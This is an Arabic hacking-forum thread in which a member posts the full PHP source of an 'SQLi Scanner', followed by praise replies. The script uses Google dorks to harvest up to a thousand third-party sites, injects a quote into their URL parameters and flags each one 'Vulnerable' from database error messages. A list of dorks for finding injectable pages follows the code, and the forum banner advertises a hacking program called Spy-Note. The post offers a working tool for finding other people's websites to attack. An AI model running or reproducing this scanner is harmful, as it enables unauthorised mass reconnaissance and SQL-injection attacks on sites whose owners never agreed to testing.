1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. احمد العراقي
    ExpErt DeveloPer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    155
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    الإقامة:
    ~ IQ-T34M ~
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    Facebook:
    YouTube:
    [​IMG]

    السلام عليكم و رحمة الله تعالى و بركاته

    اليوم احبائي اتممت التعديل على سكربت البحث عن تغرات الSQL
    و عملتله موقع خاص فيه للمنتدى
    كما اضفت معه بعض الدوركات الحديثة
    واضفت الهيدر طبعا
    كما قمت بتعريبه
    الكود سورس
    كود PHP:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
    <title>IQ - TEAM SQLi Scanner </title>
    <style>
    body{
    background: #111010;
    color: #F9F9F9;
    font-family: monospace;
    font-size: 12px;

    }

    input{
    background: #111010;
    border: 2px solid #d00a2a;
    color: #ffff00;
    }

    h2{
    color: #55FFCC;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
    a:hover{ color: #00FFCC; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>

    <div id="header">
      <div class="right"></div>
      <div class="left"></div>
        <div class="mid">
          <div align="center"><img src="http://www.iq.x10.bz/vb/web2/red-style/hatshy_header01.png" width="365" height="295" border="0" align="top" usemap="#Map">
    <map name="Map" id="Map"><area shape="rect" coords="314,262,353,275" href="http://www.iq.x10.bz/" target="_self" alt="الرئيسية">
    <area shape="rect" coords="261,262,304,276" href="http://www.iq.x10.bz/vb" target="_self" alt="المنتدى">
    <area shape="rect" coords="163,261,254,276" href="http://www.iq.x10.bz/vb" target="_self" alt="الدورات الإحترافية">
    <area shape="rect" coords="68,262,155,276" href="http://www.iq.x10.bz/vb/f20.html" target="_self" alt="SQL-injection">
    <area shape="rect" coords="14,263,58,275" href="sendmessage.php" target="_self" alt="اتصل بنا">
    </map></div>
      </div>
    </div>
    <body align="center">
    <div align=center>

    <?php
    echo "<h1>ArHack TEAM SQLi Scanner<BR></h1>";
    echo 
    "<form action='' method='post'>";
    echo 
    "<b><h3>Dork الدورك</h3> <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo 
    "<input type='submit' value='  GO! '>";
    echo 
    "<hr><br />";

    if(
    $_POST['dork']) {

    @
    set_time_limit(0);
    @
    error_reporting(0);
    @
    ignore_user_abort(true);
    ini_set('memory_limit''128M');

    $google "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i 0;
    $a 0;
    $b 0;

    while(
    $b <= 900) {
    $a 0;
    flush(); ob_flush();
    echo 
    "@ Pages: [ $b ]<br />";
    echo 
    "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo 
    "@ Google Scanner ! .<br />";
    flush(); ob_flush();

    if(
    preg_match("/did not match any documents/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $val)) {
    echo 
    "See something but not found??<br />";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $sites);
    echo 
    "Result of injection...<br />";
    flush(); ob_flush();
    while(
    1) {

    if(
    preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/"Connect_Host(str_replace("=""='"$sites[2][$a])))) {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='green'>  الموقع مصـــاب انا بريء منك- Yeah..Vulnerable ! </font><br />";
    } else {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='red'> الموقع غير مـصــابNot Vulnerable..sorry! </font><br />";
    flush(); ob_flush();
    }
    if(
    $a count($sites[2])-2) {
    echo 
    "Lets..scan other page.. <br />";
    break;
    }
    $a $a+1;
    }
    $b $b+100;
    }
    }

    function 
    Connect_Host($url) {
    $ch curl_init();
    curl_setopt($chCURLOPT_FOLLOW0);
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_TIMEOUT30);
    $data curl_exec($ch);
    if(
    $data) {
    return 
    $data;
    } else {
    return 
    0;
    }
    }

    function 
    Clean($text) {
    return 
    htmlspecialchars($textENT_QUOTES);
    }

    ?>
    </div>
    </body>
    </html> 

    <center><br><B>|IQ-T34M 2011 © All Rights reserved|</B> <td> 
    </br><p>
    <center> <font color="#D00A2A"><B>We KeeP It ReaL</B><br />By <br />~AHMAD~</font><br /><br />انا بريء من كل من استعملها في ما يخالف ديننا الحنيف <br />تحياتي~<br />D0n3.</center>

    <div align="left">
    Dork 2011 دوركات<br /><br />
    inurl:son.php?idld=<br />
    inurl:special.php?id=<br />
    inurl:club.php?id=<br />
    inurl:colum.php?id=<br />

    inurl:papier.php?id=<br />
    inurl:carton.php?id=<br />
    inurl:learn.php?id=<br />
    inurl:jour.php?id=<br />
    inurl:money.php?id=<br />
    inurl:profile.php?id=<br />
    inurl:go.php?=id<br />

    [​IMG]
     
    جاري تحميل الصفحة...
  2. MrZead0
    rank
    Developer

    عضو منذ:
    ‏13 يناير 2012
    عدد المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    تسلم ايدك ياغالى
    مبدع
     
  3. ŠŦэâm
    rank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    PC
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطل واصل ياكنق
     
  4. Tej HAcKEr
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    116
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    نظام التشغيل:
    Unix
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وَعليـَكم السلآم ورحمهَ اللهُ وبركآتهُ
    [​IMG]

    مَوضَوعُجـَميل


    يعطيُك الفَ عآفيُه
    [​IMG]
     
  5. shbl
    rank
    Developer

    عضو منذ:
    ‏7 مارس 2012
    عدد المشاركات:
    23
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    السعوديه
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    مشكور ولك مودتي
    منتظرين جديدك
     
  6. مسعود
    rank
    Developer

    عضو منذ:
    ‏9 مارس 2012
    عدد المشاركات:
    18
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطلُ اخـُويُ
     
  7. Wo0oLf
    DeveloPer Plus

    عضو منذ:
    ‏22 مارس 2012
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:
    مقيم في لبنان
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وعليكم السلآم ورحمة الله وبركآته ،،
    يعطيك ألف ع ـآفية ،
     
  8. كلآشنكوف
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    86
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    شكرا لك على الموضوع الجميل و المفيذ ♥

    جزاك الله الف خير على كل ما تقدمه لهذا المنتدى
    :{1}:

    ننتظر ابداعاتك الجميلة بفارغ الصبر
    :{8}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...